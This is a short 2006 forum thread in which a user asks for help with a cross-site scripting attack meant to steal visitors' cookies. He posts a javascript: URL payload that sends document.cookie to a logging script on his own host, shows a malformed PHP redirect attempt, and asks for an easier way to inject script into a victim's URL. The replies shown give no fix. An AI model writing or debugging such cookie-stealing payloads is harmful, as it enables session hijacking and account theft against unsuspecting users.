XSS (Cross Site Scripting)


Posted on 30-01-06 14:32
I recently set up a free web server to host my PHP scripts and try out some XSS. For some reason, it only works if the victim injects this javascript into their URL:
Code
javascript:location.replace('http://[my site]/log.php?' + document.cookie)



(I hid my site for security reasons)

When I try using a redirection PHP script, such as,
Code
<?php
header("url=nojavascript...location.replace('http://[my site]/log.php?' + document.cookie)");
exit;
?>



or something similar, it either doesn't redirect them or it redirects them to http://[my site]/log.php? without the cookie. Also, I can't find any good XSS holes in a site where I can redirect them directly using XSS.


Thanks,

SlimTim10

RE: XSS (Cross Site Scripting)


Posted on 30-01-06 14:36
Hmmm, WTF is the question?



RE: XSS (Cross Site Scripting)


Posted on 30-01-06 14:56
Maybe read it again? Pfft

I'm wondering why it won't log the cookies. I think I'm doing it correctly, but obviously if it's not working, something is wrong. My question is, could someone point out the problem for me?

And does +document.cookie work in PHP scripting, or only in javascript?

Also, is there an easier way to inject javascript into a victim's URL?

Edited by on 30-01-06 14:58